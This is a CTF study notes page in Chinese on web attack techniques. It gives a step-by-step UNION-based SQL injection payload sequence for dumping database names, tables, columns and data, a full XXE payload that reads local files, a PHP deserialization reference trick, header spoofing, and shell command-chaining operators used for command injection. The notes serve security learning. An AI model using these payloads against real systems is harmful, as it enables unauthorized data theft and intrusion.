1. ssh -p 端口 user@host

2. flag不一定在当前目录下，还可能/flag

3. bp的工具频率太高可能会不允许访问，需要手动设置线程数Number of threads，和间隔时间throttle

4. SQL注入的位置不一定是主页/登录页，在【F12】的网络里可看到请求的URL

5. SQL注入顺序：

   1. 判断闭合符1 and 1=1 、1 and 1=2 、1 or 1=1

   2. 判断列数1 order by 1/2/3

   3. 判断显示位?id=-1 union select 1,2

   4. 获取数据库名?id=-1 union select 1,database()

   5. 获取所有表名?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名')

   6. 获取字段名?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名')

   7. 获取一格数据?id=-1 union select 1,(select group_concat(字段名) from 表名)

6. 【CTF-web】文件上传（Upload-labs）知识点 - 集苑集枯 (b-yuku.icu)

7. 当有类似$this->correct === $this->input 这样的判断时，序列化时需要加&，例如$obj->input=&$obj->correct; ，原因是&表示引用，表示correct的值和input的值始终相同，而非correct的值等于input当前的值

8. 【CTF-web】sql注入注意及sqlmap使用 - 集苑集枯 (b-yuku.icu)

9. x-real-ip不像X-Forwarded-For在后面追加，而是直接替换客户端ip

10. XXE（外部实体注入）：

post数据抓包发现是xml，可构造payload：

<?xml version="1.0" encoding="UTF-8"?>                 xml文档声明
<!DOCTYPE ANY[                                         实体的名称ANY，可以随意更改
<!ENTITY admin SYSTEM "file://路径及文件">			   定义实体为admin=外部的"file://文件"
]>
<root>
<username>&admin;</username>						   调用admin
<password>2333</password>
</root>

cmd1|cmd2:不论cmd1是否为真，cmd2都会被执行；
cmd1;cmd2：不论cmd1是否为真，cmd2都会被执行；
cmd1||cmd2：如果cmd1为假，则执行cmd2；
cmd1&&cmd2：如果cmd1为真，则执行cmd2；